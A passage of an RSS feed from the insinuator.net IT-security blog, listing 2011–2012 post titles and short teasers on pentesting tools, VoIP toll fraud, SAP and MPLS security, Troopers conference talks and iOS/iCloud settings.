      <description>&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2012/02/vmm.png&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2012/02/vmm.png&#34; alt=&#34;&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;VVM on iOS 5.0.1&lt;/p&gt;&#xA;&lt;p&gt;Visual Voicemail (VVM) is a common feature of phone providers which allows accessing the good old voice-mailbox through the phone’s visual interface. In contrast to the classical voicemail approach, VVM allows intuitive navigation through voice-messages without dealing with an automated voice which tells you about message count and possible options. However, this implies the need of actually loading the messages of missed calls on the phone. The VVM-app displays missed calls and downloads corresponding messages which have been left by the initial caller. The software comes with your iPhone and is not intended for uninstallation. However, providers have to support it and will have to activate it for supporting clients. This feature is available on iPhones since August 2009 and became available on BlackBerrys and few Nokia phones later. Android doesn’t implement VVM in general. However some telecommunication providers offer their own apps to add this feature. Since version 4.0, Android offers an official Voicemail Provider API enabling better integration for the mobile OS.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Structured Approach to Handling External Connections, Part 1</title>
      <link>https://insinuator.net/2012/02/a-structured-approach-to-handling-external-connections-part-1/</link>
      <pubDate>Fri, 03 Feb 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/02/a-structured-approach-to-handling-external-connections-part-1/</guid>
      <description>&lt;p&gt;I’m currently involved in creating an up to date approach to handling external connections (read: temporary/permanent connections with external parties like business partners) of a very large enterprise. Currently they have sth along the lines of: “there’s two types of external connections, trusted and untrusted. the untrusted ones have to be connected by means of a double staged firewall”.&lt;/p&gt;&#xA;&lt;p&gt;Which – of course – doesn’t work at all in a &lt;a href=&#34;http://en.wikipedia.org/wiki/Volatility,_uncertainty,_complexity_and_ambiguity&#34;&gt;VUCA&lt;/a&gt; world, for a number of reasons (the demarcation between trusted and untrusted is quite unclear – just think of mergers &amp;amp; acquisitions –; “business doesn’t like implementing 2-staged firewalls in some part of the world where they just signed the memorandum for a joint venture to build windmills in the desert”; firewalls might not be the appropriate control for quite some threats anyway – see for example slide 46 of &lt;a href=&#34;http://www.troopers10.org/content/e728/e897/e907/TROOPERS10_Rapid_Risk_Assessment_Enno_Rey.pdf&#34;&gt;this presentation&lt;/a&gt;– and so on). Not to mention that I personally think that the “double staged firewall” thing is based on an outdated threat model, in particular when implemented with two different vendors (for the simple reason that the added operational effort usually is not worth the added security benefit. see &lt;a href=&#34;http://www.insinuator.net/2011/05/evaluating-operational-feasibility/&#34;&gt;this post&lt;/a&gt; for some discussion of the concept of “operational feasibility”…).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Don’t Pay Money for Someone Else’s Calls, Again</title>
      <link>https://insinuator.net/2012/02/dont-pay-money-for-someone-elses-calls-again/</link>
      <pubDate>Thu, 02 Feb 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/02/dont-pay-money-for-someone-elses-calls-again/</guid>
      <description>&lt;p&gt;One of our customers called us recently and asked for some support in investigating a toll fraud issue they encountered in one of their sites. Their telecommunications provider had contacted them informing them that they had accumulated a bill of 30.000€ over the last ten days.&lt;/p&gt;&#xA;&lt;p&gt;Without knowing anything more specific, I drove to the affected site to get the whole picture.&lt;/p&gt;&#xA;&lt;p&gt;They have a VoIP deployment based on Cisco Unified Communications Manager (CUCM, aka Call Manager) as Call Agent. The CUCM is connected via a H.323 trunk to a Cisco 2911 ISR G2 which is acting as a voice gateway. The ISR has a primary rate ISDN (PRI) Interface which is connected to the PBX of the telco. Furthermore they use a feature called Direct-inward Dial (DID) or Direct Dial-in (DDI) which is offered by Telco’s to enable calling parties to dial directly to an extension on a PBX or voice gateway.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Diving Into Real-World Security Threats to SAP Systems</title>
      <link>https://insinuator.net/2012/02/diving-into-real-world-security-threats-to-sap-systems/</link>
      <pubDate>Wed, 01 Feb 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/02/diving-into-real-world-security-threats-to-sap-systems/</guid>
      <description>&lt;p&gt;&lt;em&gt;&lt;strong&gt;This is a guest post by the SAP security experts of BIZEC. Enjoy reading:&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;&#xA;&lt;p&gt;On March 20^(th), the first &lt;a href=&#34;http://www.bizec.org/&#34;&gt;BIZEC&lt;/a&gt; workshop will be held at the amazing Troopers conference in Heidelberg, Germany. For those still unfamiliar with BIZEC: the &lt;em&gt;business application security initiative&lt;/em&gt; is a non-profit organization focused on security threats affecting ERP systems and business-critical infrastructures.&lt;/p&gt;&#xA;&lt;p&gt;The main goals of BIZEC are:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Raise awareness, demonstrating that ERP security must be analyzed holistically.&lt;/li&gt;&#xA;&lt;li&gt;Analyze current and future threats affecting these systems.&lt;/li&gt;&#xA;&lt;li&gt;Serve as a unique central point of knowledge and reference in this subject.&lt;/li&gt;&#xA;&lt;li&gt;Provide experienced feedback to global organizations, helping them to increase the security of their business-critical information.&lt;/li&gt;&#xA;&lt;li&gt;Organize events with the community to share and exchange information.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;The “&lt;a href=&#34;http://http://www.troopers.de/troopers12/agenda/bizec-workshop-sap-security-vulnerabilities-exploits-remediation/&#34;&gt;BIZEC workshop at Troopers 2012&lt;/a&gt;” will dive into the security of SAP platforms. Still to this day, a big part of the Auditing and Information Security industries believe that Segregation of Duties (SoD) controls are enough to protect these business-critical systems.&lt;br&gt;&#xA;By attending this session, InfoSec professionals and SAP security managers will be able to stop “flying blind” with regards to the security of their SAP systems. They will learn why SoD controls are not enough, which current threats exist that could be exploited by evil hackers, and how to protect their business-critical information from cyber-attacks.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ShmooCon, Again</title>
      <link>https://insinuator.net/2012/01/shmoocon-again/</link>
      <pubDate>Sun, 29 Jan 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/01/shmoocon-again/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/2011/01/washington-dc-for-shmoocon/%20&#34;&gt;Once more&lt;/a&gt; &lt;a href=&#34;http://www.shmoocon.org&#34;&gt;ShmooCon&lt;/a&gt; is the place to be for some days in late January. Great con, great people and five ERNW guys amongst them 😉&lt;/p&gt;&#xA;&lt;p&gt;We regard Shmoo(Con) as one of the most important community events at all and it allows us to meet fellow researchers from the US who we can’t easily sit down with to chat very often.&lt;/p&gt;&#xA;&lt;p&gt;And some lucky guys from ERNW will even continue the trip to head to San Diego (!) for &lt;a href=&#34;http://www.nanog.org/meetings/nanog54/index.php&#34;&gt;NANOG&lt;/a&gt; and &lt;a href=&#34;http://www.internetsociety.org/events/ndss-symposium-2012&#34;&gt;NDSS&lt;/a&gt;. Not to mention they stay in some fancy beach resort ;-), while I myself fly back today. (Getting older I don’t enjoy staying away from home for a week anymore and I have been missing my kids since some days…)&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 2012 – Final round of talks selected</title>
      <link>https://insinuator.net/2012/01/troopers-2012-final-round-of-talks-selected/</link>
      <pubDate>Wed, 25 Jan 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/01/troopers-2012-final-round-of-talks-selected/</guid>
      <description>&lt;p&gt;It’s done. The exciting (and demanding) process of selecting talks for Troopers is complete (for the record: second round of talk selection was &lt;a href=&#34;http://www.insinuator.net/2012/01/troopers-2012-%E2%80%93-second-round-of-talks-selected/&#34;&gt;here&lt;/a&gt;, the first &lt;a href=&#34;http://www.insinuator.net/2011/12/troopers-2012-%E2%80%93-first-round-of-talks-selected/&#34;&gt;here&lt;/a&gt;).&lt;/p&gt;&#xA;&lt;p&gt;We’re quite happy and looking forward to the event 😉&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;==================&lt;/p&gt;&#xA;&lt;p&gt;Rodrigo Branco: Into the Darkness – Dissecting Targeted Attacks&lt;/p&gt;&#xA;&lt;p&gt;The current threat landscape around cyber attacks is complex and hard to understand even for IT pros. The media coverage on recent events increases the challenge by putting fundamentally different attacks into the same category, often labeled as advanced persistent threats (APTs). The resulting mix of attacks includes everything from broadly used, exploit-kit driven campaigns driven by cyber criminals, to targeted attacks that use 0-day vulnerabilities and are hard to fend off – blurring the threat landscape, causing confusion where clarity is most needed.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 2012 – Second Round of Talks Selected</title>
      <link>https://insinuator.net/2012/01/troopers-2012-second-round-of-talks-selected/</link>
      <pubDate>Thu, 12 Jan 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/01/troopers-2012-second-round-of-talks-selected/</guid>
      <description>&lt;p&gt;Hi everybody,&lt;/p&gt;&#xA;&lt;p&gt;after having announced the first round of &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers&lt;/a&gt; speakers &lt;a href=&#34;http://www.insinuator.net/2011/12/troopers-2012-%E2%80%93-first-round-of-talks-selected/&#34;&gt;here&lt;/a&gt;, we’re happy to publish the second round today 😉&lt;/p&gt;&#xA;&lt;p&gt;Here we go:&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;==================&lt;/p&gt;&#xA;&lt;p&gt;Dmitry Sklyarov – “Secure Password Managers” and “Military-Grade Encryption” on Smartphones: Oh Really?&lt;/p&gt;&#xA;&lt;p&gt;Abstract:  The task of providing privacy and data confidentiality with mobile applications becomes more and more important as the adoption of smartphones and tablets grows. As a result, there are a number of vendors and applications providing solutions to address those needs, such as password managers and file encryption utilities for mobile devices.&lt;/p&gt;</description>
    </item>
    <item>
      <title>No Connectivity — No Malware Protection</title>
      <link>https://insinuator.net/2012/01/no-connectivity-no-malware-protection/</link>
      <pubDate>Fri, 06 Jan 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/01/no-connectivity-no-malware-protection/</guid>
      <description>&lt;p&gt;During a recent penetration test, we evaluated the security of a typical corporate employee notebook. It was to be assessed whether employees with a default corporate user account would be able to gain administrative access and subsequently abuse the system for attacks against a certain high value database system. When evaluating this problem set, the first step is to find ways to bring tools and exploit code on the system. Usually this task requires the bypassing of the malware protection agent of the system. At some point, we thought we figured a way to &lt;a href=&#34;http://carnal0wnage.attackresearch.com/2010/03/msfencode-msfpayload-into-existing.html&#34;&gt;encode&lt;/a&gt; exploits and payloads in a way that would not be detected by the malware protection solution.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Python Library for De- and Encoding of WCF-Binary streams</title>
      <link>https://insinuator.net/2011/12/python-library-for-de-and-encoding-of-wcf-binary-streams/</link>
      <pubDate>Fri, 23 Dec 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/12/python-library-for-de-and-encoding-of-wcf-binary-streams/</guid>
      <description>&lt;p&gt;In a .NET environment WCF services can use the proprietary WCF binary XML protocol described &lt;a href=&#34;https://blogs.msdn.com/b/drnick/archive/2009/09/11/binary-encoding-part-4.aspx&#34;&gt;here&lt;/a&gt;. Microsoft uses this protocol to save some time parsing the transmitted XML data. If you have to (pen-) test such services, it would be nice to read (and modify) the communication between (for example) clients and servers. One possibility is &lt;a href=&#34;http://www.fiddler2.com&#34;&gt;Fiddler&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Fiddler’s strengths include its extensibility and its WCF binary plugins. Sadly, these plugins can only decode and display the binary content as XML text.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Use Python for Burp plugins with pyBurp</title>
      <link>https://insinuator.net/2011/12/use-python-for-burp-plugins-with-pyburp/</link>
      <pubDate>Fri, 23 Dec 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/12/use-python-for-burp-plugins-with-pyburp/</guid>
      <description>&lt;p&gt;One of our favorite tools for conducting penetration tests (especially, but not only, web application tests) is Portswiggers’s &lt;a href=&#34;http://portswigger.net/burp/&#34; title=&#34;Burp Suite&#34;&gt;Burp Suite.&lt;/a&gt; Burp allows to extend its features by writing own plugins. But because Burp is written in Java, it only supports Java classes as plugins. Additionally, Burp only allows to use one plugin at the same time which has to be loaded on start-up.&lt;/p&gt;&#xA;&lt;p&gt;Now we have written a Burp-Python proxy (called &lt;strong&gt;pyBurp&lt;/strong&gt;) which adds some features to the plugin system:&lt;/p&gt;</description>
    </item>
    <item>
      <title>How Safe is Smart?</title>
      <link>https://insinuator.net/2011/12/how-safe-is-smart/</link>
      <pubDate>Thu, 22 Dec 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/12/how-safe-is-smart/</guid>
      <description>&lt;p&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2011/12/bt_smart_ready.jpg&#34; alt=&#34;Bluetooth Smart Ready Logo&#34; title=&#34;Bluetooth Smart Ready&#34;&gt;About two months ago the Bluetooth SIG &lt;a href=&#34;http://www.bluetooth.com/Pages/Press-Releases-Detail.aspx?ItemID=138%20&#34;&gt;renamed their latest standard&lt;/a&gt;, which was previously known as “Bluetooth v4.0”. When version numbers get higher and higher marketing likes to interfere and try something new. In this case: Bluetooth Smart.&lt;/p&gt;&#xA;&lt;h2 id=&#34;sounds-smart-but-is-it&#34;&gt;Sounds smart, but is it?&lt;/h2&gt;&#xA;&lt;p&gt;Without getting into too much detail, let me quickly quote Wikipedia to get started:&lt;/p&gt;&#xA;&lt;blockquote&gt;&#xA;&lt;p&gt; &lt;em&gt;“Cost-reduced single-mode chips, which enable &lt;strong&gt;highly integrated&lt;/strong&gt; and &lt;strong&gt;compact&lt;/strong&gt; devices, feature a &lt;strong&gt;lightweight&lt;/strong&gt; Link Layer providing &lt;strong&gt;ultra-low power&lt;/strong&gt; idle mode operation, &lt;strong&gt;simple&lt;/strong&gt; device discovery, and &lt;strong&gt;reliable&lt;/strong&gt; point-to-multipoint data transfer with &lt;strong&gt;advanced power-save&lt;/strong&gt; and &lt;strong&gt;secure encrypted&lt;/strong&gt; connections at the &lt;strong&gt;lowest possible cost&lt;/strong&gt;.”&lt;/em&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Liferay Portlet Shell</title>
      <link>https://insinuator.net/2011/12/liferay-portlet-shell/</link>
      <pubDate>Wed, 21 Dec 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/12/liferay-portlet-shell/</guid>
      <description>&lt;p&gt;During one of our pentests in some corporate environment we were to analyze an application-server called &lt;a href=&#34;http://www.liferay.com&#34; title=&#34;Download Liferay Portlet Shell&#34;&gt;Liferay&lt;/a&gt;. Liferay comes with a lot of functionalities, runs on top of Apache Tomcat and includes a nice API that makes it very easy to add components or further functionality that are not part of the core. These (potentially selfmade) “addons” are called “portlets” and they can be inserted in any place in the frontend.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ENISA Smartphone Secure Development Guidelines</title>
      <link>https://insinuator.net/2011/12/enisa-smartphone-secure-development-guidelines/</link>
      <pubDate>Mon, 19 Dec 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/12/enisa-smartphone-secure-development-guidelines/</guid>
      <description>&lt;p&gt;I just stumbled across &lt;a href=&#34;http://www.enisa.europa.eu/act/application-security/smartphone-security-1/smartphone-secure-development-guidelines&#34;&gt;this document&lt;/a&gt; recently published by the European Network and Information Security Agency (ENISA). It’s part of &lt;a href=&#34;http://www.enisa.europa.eu/act/application-security/smartphone-security-1&#34;&gt;their smartphone security initiative&lt;/a&gt; which we’ve already mentioned in &lt;a href=&#34;http://www.insinuator.net/2011/09/appstore-security-5-lines-of-defence-against-malware/&#34;&gt;this post&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Here’s an excerpt from the introduction:&lt;/p&gt;&#xA;&lt;p&gt;“This document was produced jointly with the OWASP mobile security project. It is also published as an ENISA deliverable in accordance with our work program 2011. It is written for developers of smartphone apps as a guide to developing secure apps. It may however also be of interest to project managers of smartphone development projects.&lt;/p&gt;</description>
    </item>
    <item>
      <title>pytacle preview</title>
      <link>https://insinuator.net/2011/12/pytacle-preview/</link>
      <pubDate>Sun, 18 Dec 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/12/pytacle-preview/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;today I’ll give a short preview of my newest tool, pytacle. It is simply a little helper program to control gnuradio/airprobe/kraken/some_other_tools, convert their input/output and to find a use able clear/cipher text combination to break A5/1. In the end it should record, crack and decode/play a gsm phone call with ~5 mouse clicks.&lt;/p&gt;&#xA;&lt;p&gt;Take a look at this video:&lt;/p&gt;&#xA;&lt;p&gt;The code is not available yet, as its not finished 😉 the recording and cracking part are working, but the decoding doesn’t. I need to put some more time into the code, but there isn’t much spare in that time of the year 😀&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 2012 – First round of talks selected</title>
      <link>https://insinuator.net/2011/12/troopers-2012-first-round-of-talks-selected/</link>
      <pubDate>Sun, 18 Dec 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/12/troopers-2012-first-round-of-talks-selected/</guid>
      <description>&lt;p&gt;We’re delighted to provide the first announcement of talks of next year’s &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers&lt;/a&gt; edition. Looks like it’s going to be a great event again  😉&lt;/p&gt;&#xA;&lt;p&gt;Here we go:&lt;/p&gt;&#xA;&lt;p&gt;==================&lt;/p&gt;&#xA;&lt;p&gt;Andreas Wiegenstein: Real SAP Backdoors&lt;/p&gt;&#xA;&lt;p&gt;Abstract: In the past year the number of lecture sessions with traumatizing headlines about hacking SAP systems has dramatically risen. Their content, however, is usually the same. Insecure implementations of algorithms, side effects in commands, flawed business logic and designs that brilliantly miss the point of security. In essence, security defects built into the SAP framework by mistake.&lt;/p&gt;</description>
    </item>
    <item>
      <title>On the discussion about the iTunes 10.5.1 update</title>
      <link>https://insinuator.net/2011/11/on-the-discussion-about-the-itunes-10.5.1-update/</link>
      <pubDate>Mon, 28 Nov 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/11/on-the-discussion-about-the-itunes-10.5.1-update/</guid>
      <description>&lt;p&gt;Currently there’s &lt;a href=&#34;http://krebsonsecurity.com/2011/11/apple-took-3-years-to-fix-finfisher-trojan-hole/&#34;&gt;quite some discussion&lt;/a&gt; ongoing why it took Apple so long to fix a &lt;a href=&#34;http://support.apple.com/kb/HT5030&#34;&gt;severe vulnerability in the update process&lt;/a&gt; of iTunes. A severe vulnerability which could easily be exploited by means of an automated tool called &lt;a href=&#34;http://www.infobytesec.com/down/isr-evilgrade-Readme.txt&#34;&gt;evilgrade&lt;/a&gt; which can be downloaded &lt;a href=&#34;http://www.infobytesec.com/developments.html&#34;&gt;here&lt;/a&gt; (Hi Francisco!). Just one small note here: did you know that evilgrade was first shown and released at the &lt;a href=&#34;http://www.troopers08.org/content/&#34;&gt;2008 edition&lt;/a&gt; of &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers&lt;/a&gt;? We had a number of initial releases of tools in the last years (like &lt;a href=&#34;http://code.google.com/p/waffit/source/browse/trunk/wafw00f.py&#34;&gt;wafw00f&lt;/a&gt; at the &lt;a href=&#34;http://www.troopers09.org/content/&#34;&gt;2009 edition&lt;/a&gt; and &lt;a href=&#34;http://vasto.nibblesec.org/&#34;&gt;VASTO&lt;/a&gt; at the &lt;a href=&#34;http://www.troopers10.org/content/e3/index_eng.html&#34;&gt;2010 edition&lt;/a&gt;) and we will continue this fine tradition in 2012. I can already promise that some nice code is going to be released for the first time at Troopers12…&lt;/p&gt;</description>
    </item>
    <item>
      <title>Carriers Converge Their Internet and MPLS Infrastructure: Time to Redo Your Risk Assessment?</title>
      <link>https://insinuator.net/2011/11/carriers-converge-their-internet-and-mpls-infrastructure-time-to-redo-your-risk-assessment/</link>
      <pubDate>Fri, 25 Nov 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/11/carriers-converge-their-internet-and-mpls-infrastructure-time-to-redo-your-risk-assessment/</guid>
      <description>&lt;p&gt;The above is the exact title of a &lt;a href=&#34;http://www.gartner.com/DisplayDocument?ref=seo&amp;amp;id=1853618%20&#34;&gt;Gartner research note&lt;/a&gt; published some days ago. Its main thesis is that an increased convergence of carriers’ MPLS and Internet infrastructures onto shared IP infrastructures requires that enterprises re-evaluate their security and performance risks.&lt;/p&gt;&#xA;&lt;p&gt;While I do not agree with the overall line of reasoning in the paper, it still highlights a number of interesting points when it comes to MPLS security. Which in turn reminds me of quite some stuff we’ve done in the past, mainly our Black Hat Europe 2009 &lt;a href=&#34;http://www.ernw.de/content/e7/e181/e1309/download1357/ERNW_BlackHatEurope09_all_your_packets_ger.pdf%20&#34;&gt;talk “All your packets are belong to us – Attacking backbone technologies”&lt;/a&gt;. Today we’ll release an updated version of the accompanying whitepaper as a kind-of technical report. Its title is “Practical Attacks against MPLS or Carrier Ethernet Networks” and it can be found &lt;a href=&#34;http://www.ernw.de/download/ERNW_MPLS-Carrier-Ethernet.pdf%20&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Wrap-up on MFD Security</title>
      <link>https://insinuator.net/2011/11/a-wrap-up-on-mfd-security/</link>
      <pubDate>Wed, 16 Nov 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/11/a-wrap-up-on-mfd-security/</guid>
      <description>&lt;p&gt;On last year’s &lt;a href=&#34;http://www.troopers.de/archives/troopers11/&#34;&gt;TROOPERS11&lt;/a&gt;, Matthias (mluft) and I gave a &lt;a href=&#34;http://www.troopers.de/wp-content/uploads/2011/04/TR11_Schaefer_Luft_Multifunction_devices.pdf&#34;&gt;talk&lt;/a&gt; on Multifunction Devices. Hardly surprising: It was related to the state of &lt;em&gt;secure&lt;/em&gt; operation of MFDs. It was heavily motivated by experiences we collected out in the wild. We faced a frightening low level of awareness concerning the role of MFDs for the overall security picture – in particular regarding the processing of sensitive data…&lt;/p&gt;&#xA;&lt;p&gt;However, instead of only showing and proving well-known weaknesses and vulnerabilities, we decided to adapt ERNW’s *&lt;a href=&#34;http://www.ernw.de/content/e7/e181/e1612/download1614/ERNW_LANline_VirtCloudSec_Keynote_ger.pdf&#34;&gt;Seven Sisters&lt;/a&gt; *model in order to match the needs of secure MFD operation and to develop some kind of guideline. As Matthias already lost some &lt;a href=&#34;http://www.insinuator.net/2011/04/sisters-act-of-mfd-security/&#34;&gt;words&lt;/a&gt; on this, I’m not gonna waste your valuable time by repeating, what has already been said. However I described our approach and our thoughts on that topic in a recently published &lt;a href=&#34;http://ernw.de/content/e15/e28/index_ger.html&#34;&gt;ERNW Newsletter&lt;/a&gt;. If for what ever reason you didn’t see our talk or even didn’t attend &lt;a href=&#34;http://www.troopers.de/archives/troopers11/&#34;&gt;TROOPERS11&lt;/a&gt; at all, have a look on Newsletter 37 and give us feedback on what you think about the whole topic…&lt;/p&gt;</description>
    </item>
    <item>
      <title>Call me Snake</title>
      <link>https://insinuator.net/2011/11/call-me-snake/</link>
      <pubDate>Wed, 16 Nov 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/11/call-me-snake/</guid>
      <description>&lt;p&gt;Once again there’s a &lt;a href=&#34;http://www.insinuator.net/2011/09/today-i-feel-like-stansfield/&#34;&gt;reference&lt;/a&gt; to some action movie here, as some of you may have immediately spotted ;-).&lt;/p&gt;&#xA;&lt;p&gt;For the record: this one is from “Snake Plissken”, the main protagonist in John Carpenter’s “Escape from New York”. There’s another well-known quote of the same character in the kind-of sequel “Escape from L.A.” which goes like: “The more things change, the more they stay the same”. I’m aware that this is not the initial source (but French novelist Jean-Baptiste Alphonse Karr presumably is, at the time in French ;-)); still this gives a nice  transition to today’s topic.&lt;/p&gt;</description>
    </item>
    <item>
      <title>“What’s so special about Troopers?”</title>
      <link>https://insinuator.net/2011/11/whats-so-special-about-troopers/</link>
      <pubDate>Fri, 11 Nov 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/11/whats-so-special-about-troopers/</guid>
      <description>&lt;p&gt;This week I stayed some days in Zurich, to give a workshop and to meet both clients and fellow researchers (kudos again to C. for the awesome office tour @Google). In the course of one of those dinners somehow Troopers was mentioned and a guy asked: “I’ve heard of the conference. What’s so special about it?”&lt;/p&gt;&#xA;&lt;p&gt;Funnily enough I didn’t even have to respond myself as a &lt;a href=&#34;http://www.troopers.de/archives/troopers11/agenda/&#34;&gt;2011&lt;/a&gt; attendee coincidentally present at the table jumped in and started praising the event (“best con ever. great spirit, great talks”). Obviously this gave me a big grin… but it reminded as well me that some of you might ask themselves the very same question.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Sneak Peek into TROOPERS12</title>
      <link>https://insinuator.net/2011/11/a-sneak-peek-into-troopers12/</link>
      <pubDate>Thu, 10 Nov 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/11/a-sneak-peek-into-troopers12/</guid>
      <description>&lt;h2 id=&#34;troopers11-speaker-badgeshere-we-go-again-troopers12-is-scheduled-for-march-19th--23rd-2012-in-heidelberg-germany&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2011/11/speaker_badges.jpg&#34; alt=&#34;TROOPERS11 Speaker badges&#34; title=&#34;TROOPERS11 Speaker badges&#34;&gt;Here we go again: &lt;strong&gt;TROOPERS12&lt;/strong&gt; is scheduled for March 19^(th) – 23^(rd) 2012 in Heidelberg, Germany.&lt;/h2&gt;&#xA;&lt;p&gt;Those who attended &lt;strong&gt;TROOPERS&lt;/strong&gt; before know for what we are up to. For all newcomers I’ll quickly outline what’s going to happen:&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;TROOPERS&lt;/strong&gt; is your premium IT security event in Europe. Think of your usual IT educational event without annoying sales pitching and outdated topics. Now add a superb conference location, an elite line-up of international researchers and practitioners as well as an &lt;a href=&#34;http://www.ernw.de&#34; title=&#34;ERNW GmbH&#34;&gt;organizing team&lt;/a&gt; not dedicated to make a living doing this, but to celebrate our craftsmanship together with like-minded people.&lt;/p&gt;</description>
    </item>
    <item>
      <title>iOS 5, S/MIME, and Digital Certificate Management</title>
      <link>https://insinuator.net/2011/11/ios-5-s/mime-and-digital-certificate-management/</link>
      <pubDate>Fri, 04 Nov 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/11/ios-5-s/mime-and-digital-certificate-management/</guid>
      <description>&lt;p&gt;As a follow-up to &lt;a href=&#34;http://www.insinuator.net/2011/10/certificate-based-device-authentication-with-ios-devices/&#34;&gt;this post&lt;/a&gt; somebody pointed us to &lt;a href=&#34;http://www.css-security.com/blog/ios-5-smime-and-digital-certificate-management/&#34;&gt;this interesting article&lt;/a&gt; on S/MIME support and associated certificate mgmt in iOS 5. Nice read which some of you may find worthwhile.&lt;/p&gt;&#xA;&lt;p&gt;On a related note: if anyone is aware of an easy way/good (3rd party) solution for pushing certs to iOS devices (besides SCEP) we would be very interested in that one. In that case pls leave a comment or shoot us an email.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Short iCloud Follow-Up</title>
      <link>https://insinuator.net/2011/10/short-icloud-follow-up/</link>
      <pubDate>Mon, 31 Oct 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/10/short-icloud-follow-up/</guid>
      <description>&lt;p&gt;After the basic iCloud discussion in &lt;a href=&#34;http://www.insinuator.net/2011/10/itrust-or-not/&#34;&gt;this&lt;/a&gt; post, I would like to add some more technical information. The following items are just a loose compilation of facts about the mentioned controls which allow the restriction of iCloud usage. The basic iCloud usage, consisting of backup, document sync, and photo stream, can be deactivated using the most recent version of the &lt;a href=&#34;http://support.apple.com/kb/dl851&#34;&gt;iPhone Configuration Utility&lt;/a&gt;:&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2011/10/icloud_config_icloud.png&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2011/10/icloud_config_icloud.png&#34; alt=&#34;&#34; title=&#34;icloud_config_icloud&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Since there are no default settings for these values, it is necessary to include the disabled entries in existing configuration profiles.&lt;/p&gt;</description>
    </item>
    <item>
      <title>All Your Clouds are Belong to us</title>
      <link>https://insinuator.net/2011/10/all-your-clouds-are-belong-to-us/</link>
      <pubDate>Mon, 24 Oct 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/10/all-your-clouds-are-belong-to-us/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.nds.rub.de/media/nds/veroeffentlichungen/2011/10/22/AmazonSignatureWrapping.pdf&#34;&gt;This&lt;/a&gt; is a _very_ interesting paper just published by some researchers (mainly) from RUB (Ruhr-University Bochum). Here’s the abstract:&lt;/p&gt;&#xA;&lt;p&gt;“Cloud Computing resources are handled through control interfaces. It is through these interfaces that the new machine images can be added, existing ones can be modied, and instances can be started or ceased. Effectively, a successful attack on a Cloud control interface grants the attacker a complete power over the victim’s account, with all the stored data included.&lt;/p&gt;</description>
    </item>
    <item>
      <title>iTrust. Or not?</title>
      <link>https://insinuator.net/2011/10/itrust.-or-not/</link>
      <pubDate>Sun, 23 Oct 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/10/itrust.-or-not/</guid>
